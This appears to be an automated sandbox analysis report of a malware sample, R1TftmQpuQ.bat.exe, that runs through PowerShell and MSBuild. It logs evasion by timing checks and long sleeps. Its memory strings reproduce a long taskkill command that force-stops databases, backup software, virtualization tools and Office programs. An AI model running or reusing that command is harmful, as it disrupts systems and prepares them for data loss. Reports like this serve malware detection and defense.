        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: Yara matchFile source: Process Memory Space: R1TftmQpuQ.bat.exe PID: 5664, type: MEMORYSTR
        Source: c:\users\user\desktop\r1tftmqpuq.bat.exeKey value queried: Powershell behaviorJump to behavior
        Source: cmd.exe, 00000008.00000003.2557590841.00000000027C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: START "KILLER" CMD /C "COLOR E & @TASKKILL /IM PG_CTL.EXE /F & @TASKKILL /IM RCRELAY.EXE /F & @TASKKILL /IM SOGOUIMEBROKER.EXE /F & @TASKKILL /IM CCENTER.EXE /F & @TASKKILL /IM SCANFRM.EXE /F & @TASKKILL /IM D_MANAGE.EXE /F & @TASKKILL /IM RSTRAY.EXE /F & @TASKKILL /IM WAMPMANAGER.EXE /F & @TASKKILL /IM RAVTRAY.EXE /F & @TASKKILL /IM MSSEARCH.EXE /F & @TASKKILL /IM SQLMANGR.EXE /F & @TASKKILL /IM MSFTESQL.EXE /F & @TASKKILL /IM SYNCBASESVR.EXE /F & @TASKKILL /IM ORACLE.EXE /F & @TASKKILL /IM TNSLSNR.EXE /F & @TASKKILL /IM SYNCBASECONSOLE.EXE /F & @TASKKILL /IM ASPNET_STATE.EXE /F & @TASKKILL /IM AUTOBACKUPEX.EXE /F & @TASKKILL /IM REDIS-SERVER.EXE /F & @TASKKILL /IM MYSQLNOTIFIER.EXE /F & @TASKKILL /IM ORAVSSW.EXE /F & @TASKKILL /IM FPPDIS5.EXE /F & @TASKKILL /IM HIS6SERVICE.EXE /F & @TASKKILL /IM DINOTIFY.EXE /F & @TASKKILL /IM JHTASK.EXE /F & @TASKKILL /IM EXECUTER.EXE /F & @TASKKILL /IM ALLPASSCBHOST.EXE /F & @TASKKILL /IM AP_NGINX.EXE /F & @TASKKILL /IM ANDROIDSERVER.EXE /F & @TASKKILL /IM XT.EXE /F & @TASKKILL /IM XTSERVICE.EXE /F & @TASKKILL /IM ALLPASSMCSERVICE.EXE /F & @TASKKILL /IM IMEDICTUPDATE.EXE /F & @TASKKILL /IM FLASHHELPERSERVICE.EXE /F & @TASKKILL /IM AP_REDIS-SERVER.EXE /F & @TASKKILL /IM UTILDEV.WEBSERVER.MONITOR.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FOXITPROTECT.EXE /F & @TASKKILL /IM FTNLSES.EXE /F & @TASKKILL /IM FTUSBRDWKS.EXE /F & @TASKKILL /IM FTUSBRDSRV.EXE /F & @TASKKILL /IM FTNLSV.EXE /F & @TASKKILL /IM SYSLOGD_SERVICE.EXE /F & @TASKKILL /IM UWS.HIGHPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM FTUSBSRV.EXE /F & @TASKKILL /IM UWS.LOWPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.ANYCPU.EXE /F & @TASKKILL /IM WINGUARD_X64.EXE /F & @TASKKILL /IM VMCONNECT.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FIREFOX.EXE /F & @TASKKILL /IM USBRDSRV.EXE /F & @TASKKILL /IM USBSERVER.EXE /F & @TASKKILL /IM FOXMAIL.EXE /F & @TASKKILL /IM QEMU-GA.EXE /F & @TASKKILL /IM WWBIZSRV.EXE /F & @TASKKILL /IM ZTEFILETRANS.EXE /F & @TASKKILL /IM ZTEUSBIPC.EXE /F & @TASKKILL /IM ZTEUSBIPCGUARD.EXE /F & @TASKKILL /IM ALIBABAPROTECT.EXE /F & @TASKKILL /IM KBASESRV.EXE /F & @TASKKILL /IM ZTEVDSERVICE.EXE /F & @TASKKILL /IM MMRHOOKSERVICE.EXE /F & @TASKKILL /IM EXTJOB.EXE /F & @TASKKILL /IM IPOVERUSBSVC.EXE /F & @TASKKILL /IM VMWARETRAY.EXE /F & @TASKKILL /IM DEVENV.EXE /F & @TASKKILL /IM PERFWATSON2.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.NODE.X86.EXE /F & @TASKKILL /IM SERVICEHUB.IDENTITYHOST.EXE /F & @TASKKILL /IM SERVICEHUB.VSDETOUREDHOST.EXE /F & @TASKKILL /IM SERVICEHUB.SETTINGSHOST.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.CLR.X86.EXE /F & @TASKKILL /IM SERVICEHUB.ROSLYNCODEANALYSISSERVICE32.EXE /F & @TASKKILL /IM SERVICEHUB.DATAWAREHOUSEHOST.EXE /F & @TASKKILL /IM MICROSOFT.VISUALSTUDIO.WEB.HOST.EXE /F & @TASKKILL /IM SQLEXPRWT.EXE /F & @TASKKILL /IM SETUP.EXE /F & @TASKKILL /IM REMOTE.EXE /F & @TASKKILL /IM SETUP100.EXE /F & @TASKKILL /IM LANDINGPAGE.EXE /F & @TASKKILL /IM WINWORD.EXE /
        Source: cmd.exe, 00000008.00000003.2557092127.0000000002B31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: L /IM ALLPASSMCSERVICE.EXE /F & @TASKKILL /IM IMEDICTUPDATE.EXE /F & @TASKKILL /IM FLASHHELPERSERVICE.EXE /F & @TASKKILL /IM AP_REDIS-SERVER.EXE /F & @TASKKILL /IM UTILDEV.WEBSERVER.MONITOR.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FOXITPROTECT.EXE /F & @TASKKILL /IM FTNLSES.EXE /F & @TASKKILL /IM FTUSBRDWKS.EXE /F & @TASKKILL /IM FTUSBRDSRV.EXE /F & @TASKKILL /IM FTNLSV.EXE /F & @TASKKILL /IM SYSLOGD_SERVICE.EXE /F & @TASKKILL /IM UWS.HIGHPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM FTUSBSRV.EXE /F & @TASKKILL /IM UWS.LOWPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.ANYCPU.EXE /F & @TASKKILL /IM WINGUARD_X64.EXE /F & @TASKKILL /IM VMCONNECT.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FIREFOX.EXE /F & @TASKKILL /IM USBRDSRV.EXE /F & @TASKKILL /IM USBSERVER.EXE /F & @TASKKILL /IM FOXMAIL.EXE /F & @TASKKILL /IM QEMU-GA.EXE /F & @TASKKILL /IM WWBIZSRV.EXE /F & @TASKKILL /IM ZTEFILETRANS.EXE /F & @TASKKILL /IM ZTEUSBIPC.EXE /F & @TASKKILL /IM ZTEUSBIPCGUARD.EXE /F & @TASKKILL /IM ALIBABAPROTECT.EXE /F & @TASKKILL /IM KBASESRV.EXE /F & @TASKKILL /IM ZTEVDSERVICE.EXE /F & @TASKKILL /IM MMRHOOKSERVICE.EXE /F & @TASKKILL /IM EXTJOB.EXE /F & @TASKKILL /IM IPOVERUSBSVC.EXE /F & @TASKKILL /IM VMWARETRAY.EXE /F & @TASKKILL /IM DEVENV.EXE /F & @TASKKILL /IM PERFWATSON2.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.NODE.X86.EXE /F & @TASKKILL /IM SERVICEHUB.IDENTITYHOST.EXE /F & @TASKKILL /IM SERVICEHUB.VSDETOUREDHOST.EXE /F & @TASKKILL /IM SERVICEHUB.SETTINGSHOST.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.CLR.X86.EXE /F & @TASKKILL /IM SERVICEHUB.ROSLYNCODEANALYSISSERVICE32.EXE /F & @TASKKILL /IM SERVICEHUB.DATAWAREHOUSEHOST.EXE /F & @TASKKILL /IM MICROSOFT.VISUALSTUDIO.WEB.HOST.EXE /F & @TASKKILL /IM SQLEXPRWT.EXE /F & @TASKKILL /IM SETUP.EXE /F & @TASKKILL /IM REMOTE.EXE /F & @TASKKILL /IM SETUP100.EXE /F & @TASKKILL /IM LANDINGPAGE.EXE /F & @TASKKILL /IM WINWORD.EXE /F & @TASKKILL /IM KUAIYUN.EXE /F & @TASKKILL /IM HWSHOSTPANEL.EXE /F & @TASKKILL /IM NOVELSPIDER.EXE /F & @TASKKILL /IM SERVICE_KMS.EXE /F & @TASKKILL /IM WEBSERVER.EXE /F & @TASKKILL /IM CHSIME.EXE /F & @TASKKILL /IM BTPANEL.EXE /F & @TASKKILL /IM PROTECT_2345EXPLORER.EXE /F & @TASKKILL /IM PIC_2345SVC.EXE /F & @TASKKILL /IM VMWARE-CONVERTER-A.EXE /F & @TASKKILL /IM VMWARE-CONVERTER.EXE /F & @TASKKILL /IM VMWARE.EXE /F & @TASKKILL /IM VMWARE-UNITY-HELPER.EXE /F & @TASKKILL /IM VMWARE-VMX.EXE /F & @TASKKILL /IM VMWARE-VMX.EXE /F & @TASKKILL /IM USYSDIAG.EXE /F & @TASKKILL /IM POPBLOCK.EXE /F & @TASKKILL /IM GSINTERFACE.EXE /F & @TASKKILL /IM GEMSTAR.GROUP.CRS.CLIENT.EXE /F & @TASKKILL /IM TENPAYSERVER.EXE /F & @TASKKILL /IM REMOTEEXECSERVICE.EXE /F & @TASKKILL /IM VS_TRUECORSMANAGER.EXE /F & @TASKKILL /IM NTPSVR-2019-01-22-WGS84.EXE /F & @TASKKILL /IM RTKJOB-ION.EXE /F & @TASKKILL /IM NTPSVR-2019-01-22-NO-USRCHECK.EXE /F & @TASKKILL /IM NTRIPCASTER-2019-01-08.EXE /F & @TASKKILL /IM BACSTRAY.EXE /F & @TASKKILL /IM PROTECT.EXE /F & @TASKKILL /IM HFS
        Source: cmd.exe, 00000008.00000003.2557590841.00000000027C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F & @TASKKILL /IM ASPNET_STATE.EXE /F & @TASKKILL /IM AUTOBACKUPEX.EXE /F & @TASKKILL /IM REDIS-SERVER.EXE /F & @TASKKILL /IM MYSQLNOTIFIER.EXE /F & @TASKKILL /IM ORAVSSW.EXE /F & @TASKKILL /IM FPPDIS5.EXE /F & @TASKKILL /IM HIS6SERVICE.EXE /F & @TASKKILL /IM DINOTIFY.EXE /F & @TASKKILL /IM JHTASK.EXE /F & @TASKKILL /IM EXECUTER.EXE /F & @TASKKILL /IM ALLPASSCBHOST.EXE /F & @TASKKILL /IM AP_NGINX.EXE /F & @TASKKILL /IM ANDROIDSERVER.EXE /F & @TASKKILL /IM XT.EXE /F & @TASKKILL /IM XTSERVICE.EXE /F & @TASKKILL /IM ALLPASSMCSERVICE.EXE /F & @TASKKILL /IM IMEDICTUPDATE.EXE /F & @TASKKILL /IM FLASHHELPERSERVICE.EXE /F & @TASKKILL /IM AP_REDIS-SERVER.EXE /F & @TASKKILL /IM UTILDEV.WEBSERVER.MONITOR.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FOXITPROTECT.EXE /F & @TASKKILL /IM FTNLSES.EXE /F & @TASKKILL /IM FTUSBRDWKS.EXE /F & @TASKKILL /IM FTUSBRDSRV.EXE /F & @TASKKILL /IM FTNLSV.EXE /F & @TASKKILL /IM SYSLOGD_SERVICE.EXE /F & @TASKKILL /IM UWS.HIGHPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM FTUSBSRV.EXE /F & @TASKKILL /IM UWS.LOWPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.ANYCPU.EXE /F & @TASKKILL /IM WINGUARD_X64.EXE /F & @TASKKILL /IM VMCONNECT.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FIREFOX.EXE /F & @TASKKILL /IM USBRDSRV.EXE /F & @TASKKILL /IM USBSERVER.EXE /F & @TASKKILL /IM FOXMAIL.EXE /F & @TASKKILL /IM QEMU-GA.EXE /F & @TASKKILL /IM WWBIZSRV.EXE /F & @TASKKILL /IM ZTEFILETRANS.EXE /F & @TASKKILL /IM ZTEUSBIPC.EXE /F & @TASKKILL /IM ZTEUSBIPCGUARD.EXE /F & @TASKKILL /IM ALIBABAPROTECT.EXE /F & @TASKKILL /IM KBASESRV.EXE /F & @TASKKILL /IM ZTEVDSERVICE.EXE /F & @TASKKILL /IM MMRHOOKSERVICE.EXE /F & @TASKKILL /IM EXTJOB.EXE /F & @TASKKILL /IM IPOVERUSBSVC.EXE /F & @TASKKILL /IM VMWARETRAY.EXE /F & @TASKKILL /IM DEVENV.EXE /F & @TASKKILL /IM PERFWATSON2.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.NODE.X86.EXE /F & @TASKKILL /IM SERVICEHUB.IDENTITYHOST.EXE /F & @TASKKILL /IM SERVICEHUB.VSDETOUREDHOST.EXE /F & @TASKKILL /IM SERVICEHUB.SETTINGSHOST.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.CLR.X86.EXE /F & @TASKKILL /IM SERVICEHUB.ROSLYNCODEANALYSISSERVICE32.EXE /F & @TASKKILL /IM SERVICEHUB.DATAWAREHOUSEHOST.EXE /F & @TASKKILL /IM MICROSOFT.VISUALSTUDIO.WEB.HOST.EXE /F & @TASKKILL /IM SQLEXPRWT.EXE /F & @TASKKILL /IM SETUP.EXE /F & @TASKKILL /IM REMOTE.EXE /F & @TASKKILL /IM SETUP100.EXE /F & @TASKKILL /IM LANDINGPAGE.EXE /F & @TASKKILL /IM WINWORD.EXE /F & @TASKKILL /IM KUAIYUN.EXE /F & @TASKKILL /IM HWSHOSTPANEL.EXE /F & @TASKKILL /IM NOVELSPIDER.EXE /F & @TASKKILL /IM SERVICE_KMS.EXE /F & @TASKKILL /IM WEBSERVER.EXE /F & @TASKKILL /IM CHSIME.EXE /F & @TASKKILL /IM BTPANEL.EXE /F & @TASKKILL /IM PROTECT_2345EXPLORER.EXE /F & @TASKKILL /IM PIC_2345SVC.EXE /F & @TASKKILL /IM VMWARE-CONVERTER-A.EXE /F & @TASKKILL /IM VMWARE-CONVERTER.EXE /F & @TASKKILL /IM VMWARE.EXE /F & @TASKKILL /IM VMWARE-UNITY-HELPER.EXE /F & @TASKKILL /IM VMWARE-VMX.EXE /F & @TASKKILL /IM VMWARE-VMX.EXE /F & @TASKKILL /IM
        Source: cmd.exe, 00000008.00000003.2557013274.0000000002B40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /C "COLOR E & @TASKKILL /IM PG_CTL.EXE /F & @TASKKILL /IM RCRELAY.EXE /F & @TASKKILL /IM SOGOUIMEBROKER.EXE /F & @TASKKILL /IM CCENTER.EXE /F & @TASKKILL /IM SCANFRM.EXE /F & @TASKKILL /IM D_MANAGE.EXE /F & @TASKKILL /IM RSTRAY.EXE /F & @TASKKILL /IM WAMPMANAGER.EXE /F & @TASKKILL /IM RAVTRAY.EXE /F & @TASKKILL /IM MSSEARCH.EXE /F & @TASKKILL /IM SQLMANGR.EXE /F & @TASKKILL /IM MSFTESQL.EXE /F & @TASKKILL /IM SYNCBASESVR.EXE /F & @TASKKILL /IM ORACLE.EXE /F & @TASKKILL /IM TNSLSNR.EXE /F & @TASKKILL /IM SYNCBASECONSOLE.EXE /F & @TASKKILL /IM ASPNET_STATE.EXE /F & @TASKKILL /IM AUTOBACKUPEX.EXE /F & @TASKKILL /IM REDIS-SERVER.EXE /F & @TASKKILL /IM MYSQLNOTIFIER.EXE /F & @TASKKILL /IM ORAVSSW.EXE /F & @TASKKILL /IM FPPDIS5.EXE /F & @TASKKILL /IM HIS6SERVICE.EXE /F & @TASKKILL /IM DINOTIFY.EXE /F & @TASKKILL /IM JHTASK.EXE /F & @TASKKILL /IM EXECUTER.EXE /F & @TASKKILL /IM ALLPASSCBHOST.EXE /F & @TASKKILL /IM AP_NGINX.EXE /F & @TASKKILL /IM ANDROIDSERVER.EXE /F & @TASKKILL /IM XT.EXE /F & @TASKKILL /IM XTSERVICE.EXE /F & @TASKKILL /IM ALLPASSMCSERVICE.EXE /F & @TASKKILL /IM IMEDICTUPDATE.EXE /F & @TASKKILL /IM FLASHHELPERSERVICE.EXE /F & @TASKKILL /IM AP_REDIS-SERVER.EXE /F & @TASKKILL /IM UTILDEV.WEBSERVER.MONITOR.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FOXITPROTECT.EXE /F & @TASKKILL /IM FTNLSES.EXE /F & @TASKKILL /IM FTUSBRDWKS.EXE /F & @TASKKILL /IM FTUSBRDSRV.EXE /F & @TASKKILL /IM FTNLSV.EXE /F & @TASKKILL /IM SYSLOGD_SERVICE.EXE /F & @TASKKILL /IM UWS.HIGHPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM FTUSBSRV.EXE /F & @TASKKILL /IM UWS.LOWPRIVILEGEUTILITIES.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.ANYCPU.EXE /F & @TASKKILL /IM WINGUARD_X64.EXE /F & @TASKKILL /IM VMCONNECT.EXE /F & @TASKKILL /IM UWS.APPHOST.CLR2.X86.EXE /F & @TASKKILL /IM FIREFOX.EXE /F & @TASKKILL /IM USBRDSRV.EXE /F & @TASKKILL /IM USBSERVER.EXE /F & @TASKKILL /IM FOXMAIL.EXE /F & @TASKKILL /IM QEMU-GA.EXE /F & @TASKKILL /IM WWBIZSRV.EXE /F & @TASKKILL /IM ZTEFILETRANS.EXE /F & @TASKKILL /IM ZTEUSBIPC.EXE /F & @TASKKILL /IM ZTEUSBIPCGUARD.EXE /F & @TASKKILL /IM ALIBABAPROTECT.EXE /F & @TASKKILL /IM KBASESRV.EXE /F & @TASKKILL /IM ZTEVDSERVICE.EXE /F & @TASKKILL /IM MMRHOOKSERVICE.EXE /F & @TASKKILL /IM EXTJOB.EXE /F & @TASKKILL /IM IPOVERUSBSVC.EXE /F & @TASKKILL /IM VMWARETRAY.EXE /F & @TASKKILL /IM DEVENV.EXE /F & @TASKKILL /IM PERFWATSON2.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.NODE.X86.EXE /F & @TASKKILL /IM SERVICEHUB.IDENTITYHOST.EXE /F & @TASKKILL /IM SERVICEHUB.VSDETOUREDHOST.EXE /F & @TASKKILL /IM SERVICEHUB.SETTINGSHOST.EXE /F & @TASKKILL /IM SERVICEHUB.HOST.CLR.X86.EXE /F & @TASKKILL /IM SERVICEHUB.ROSLYNCODEANALYSISSERVICE32.EXE /F & @TASKKILL /IM SERVICEHUB.DATAWAREHOUSEHOST.EXE /F & @TASKKILL /IM MICROSOFT.VISUALSTUDIO.WEB.HOST.EXE /F & @TASKKILL /IM SQLEXPRWT.EXE /F & @TASKKILL /IM SETUP.EXE /F & @TASKKILL /IM REMOTE.EXE /F & @TASKKILL /IM SETUP100.EXE /F & @TASKKILL /IM LANDINGPAGE.EXE /F & @TASKKILL /IM WINWORD.EXE /F & @TASKKILL /IM K
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeMemory allocated: 4890000 memory reserve | memory write watchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406360 rdtsc 10_2_00406360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_004079B9 __EH_prolog3_GS,NtQuerySystemInformation,NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,CloseHandle,CloseHandle,GetFileType,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CreateThread,GetCurrentProcessId,CloseHandle,CloseHandle,10_2_004079B9
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 180000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 1800000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 3600000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 7200000Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 18000000Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeWindow / User API: threadDelayed 4990Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeWindow / User API: threadDelayed 4664Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5073Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4775Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe TID: 6992Thread sleep count: 4990 > 30Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe TID: 4632Thread sleep time: -21213755684765971s >= -30000sJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe TID: 5708Thread sleep count: 4664 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6792Thread sleep time: -23058430092136925s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5368Thread sleep time: -180000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5368Thread sleep time: -600000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5368Thread sleep time: -1800000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5368Thread sleep time: -3600000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5368Thread sleep time: -7200000s >= -30000sJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5368Thread sleep time: -18000000s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\Users\user\Desktop FullSizeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00406360 GetCommandLineW,CommandLineToArgvW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,StrDupW,LocalFree,QueryPerformanceCounter,GetTickCount,GetCurrentThreadId,GetCurrentProcessId,CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,SetErrorMode,GetComputerNameA,GetWindowsDirectoryA,CreateFileA,GetFileTime,CloseHandle,FindFirstFileExW,GetLastError,CloseHandle,CreateThread,LocalFree,TerminateThread,GetModuleFileNameW,wnsprintfW,ExitProcess,10_2_00406360
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_00404F91 wnsprintfW,FindFirstFileExW,lstrcmpW,lstrcmpW,wnsprintfW,lstrcmpiW,lstrcmpiW,lstrcmpiW,StrStrIW,lstrlenW,lstrlenW,lstrcmpiW,StrStrIW,lstrlenW,lstrlenW,StrStrIW,lstrlenW,StrCmpNIW,lstrlenW,lstrcpyW,SleepEx,PostQueuedCompletionStatus,FindNextFileW,FindClose,wnsprintfW,10_2_00404F91
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 10_2_0040FF6F FindFirstFileExW,10_2_0040FF6F
